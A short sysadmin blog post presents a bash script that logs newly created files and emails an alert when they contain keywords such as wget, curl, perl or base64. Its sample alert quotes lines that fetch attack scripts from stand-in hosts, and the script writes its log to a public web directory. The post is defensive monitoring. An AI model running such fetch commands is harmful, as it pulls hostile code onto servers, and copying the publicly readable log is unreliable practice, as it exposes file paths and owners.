Detect New Files and Send Notification if Suspicious

By On 29 June 2011 · Leave a Comment

This post will required Fsniper installed and running on your box. Please see following post: FSniper – Monitor Newly Created Files in Directory . This is similar to popular paid-version of ConfigServer eXploit Scanner (cxs), which also using inotify functionality which comes since kernel 2.6.13.

I am using Fsniper to check and detect new files and let handler trigger following scripts. This scripts will log any new files which captured by FSniper to /var/www/html/new_files.txt (so i can browse the files using web browser by accessing http://yourwebsite.com/new_files.txt) and then notify me whenever they found any of suspicious words inside the files:
wget, curl, lynx, gcc, perl, sh, cd, mkdir, touch, base64

#!/bin/bash
output_file='/var/www/html/new_files.txt'
user_owner=`ls -al $1 | awk '{print $3}'`
ip=`hostname -i`
subject='Found something suspicious'
emailto='[email protected]'
message=/tmp/emailmessage.txt
 
echo $(date +"%Y-%m-%d") $(date +%k:%M) ">>" $1 "|" $user_owner >> $output_file
 
danger=`egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 | wc -l`
 
if [ $danger -gt 0 ]; then
echo 'Server:' $(hostname) > $message
egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 >> $message
mail -s "$ip | $subject"  "$emailto" < $message
fi

The email you will received will be similar like this:

From: root
To: [email protected]
Subject: 192.168.1.1 | Found something suspicious
Email Body:
 
Server: hostname.myserver.domain.tld
/home/user/public_html/test3.php:wget http://192.168.0.100/bad_thing.php
/home/user/public_html/test3.php:curl http://hackers.tld/scripts

This will help you monitor any changes files and make sure you are the first to know if the new files is containing unwanted words. You can modify the script to suit your needs.

Tagged with:
 
If you enjoyed this article, please consider sharing it!

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>